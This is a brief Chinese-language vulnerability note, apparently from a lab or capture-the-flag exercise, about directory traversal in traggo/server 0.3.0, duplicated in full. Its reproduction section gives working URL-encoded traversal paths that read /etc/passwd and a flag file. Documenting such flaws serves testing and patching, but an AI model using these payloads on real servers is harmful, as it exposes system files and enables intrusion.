一、漏洞概述
traggo/server 版本 0.3.0 容易受到目录遍历的攻击。
二、影响范围
traggo 0.3.0
三、访问页面
四、漏洞复现
/static/..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c/flag
一、漏洞概述
traggo/server 版本 0.3.0 容易受到目录遍历的攻击。
二、影响范围
traggo 0.3.0
三、访问页面
四、漏洞复现
/static/..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c/flag